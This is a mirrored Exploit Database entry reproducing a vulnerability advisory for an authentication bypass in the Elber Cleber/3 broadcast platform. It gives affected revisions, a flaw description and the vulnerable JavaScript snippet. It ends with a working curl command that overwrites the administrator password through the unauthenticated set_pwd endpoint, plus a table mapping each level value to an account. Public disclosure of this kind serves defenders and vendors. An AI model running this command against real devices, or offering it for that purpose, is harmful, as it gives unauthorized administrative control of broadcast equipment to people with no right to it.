Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 – Authentication Bypass

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2024-05-04
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/52004/

• Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
  
  
  Vendor: Elber S.r.l.
  Product web page: https://www.elber.it
  Affected version: 1.0.0 Revision 7304
  1.0.0 Revision 7284
  1.0.0 Revision 6505
  1.0.0 Revision 6332
  1.0.0 Revision 6258
  XS2DAB v1.50 rev 6267
  
  Summary: Cleber offers a powerful, flexible and modular hardware and
  software platform for broadcasting and contribution networks where
  customers can install up to six boards with no limitations in terms
  of position or number. Based on a Linux embedded OS, it detects the
  presence of the boards and shows the related control interface to the
  user, either through web GUI and Touchscreen TFT display. Power supply
  can be single (AC and/or DC) or dual (hot swappable for redundancy);
  customer may chose between two ranges for DC sources, that is 22-65
  or 10-36 Vdc for site or DSNG applications.
  
  Desc: The device suffers from an authentication bypass vulnerability through
  a direct and unauthorized access to the password management functionality. The
  issue allows attackers to bypass authentication by manipulating the set_pwd
  endpoint that enables them to overwrite the password of any user within the
  system. This grants unauthorized and administrative access to protected areas
  of the application compromising the device's system security.
  
  --------------------------------------------------------------------------
  /modules/pwd.html
  ------------------
  50: function apply_pwd(level, pwd)
  51: {
  52: 	$.get("json_data/set_pwd", {lev:level, pass:pwd},
  53: 	function(data){
  54: 		//$.alert({title:'Operation',text:data});
  55: 		show_message(data);
  56: 	}).fail(function(error){
  57: 		show_message('Error ' + error.status, 'error');
  58: 	});
  59: }
  
  --------------------------------------------------------------------------
  
  Tested on: NBFM Controller
   embOS/IP
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2024-5816
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php
  
  
  18.08.2023
  
  --
  
  
  $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
  
  Ref (lev param):
  
  Level 7 = SNMP Write Community (snmp_write_pwd)
  Level 6 = SNMP Read Community (snmp_read_pwd)
  Level 5 = Custom Password? hidden. (custom_pwd)
  Level 4 = Display Password (display_pwd)?
  Level 2 = Administrator Password (admin_pwd)
  Level 1 = Super User Password (puser_pwd)
  Level 0 = User Password (user_pwd)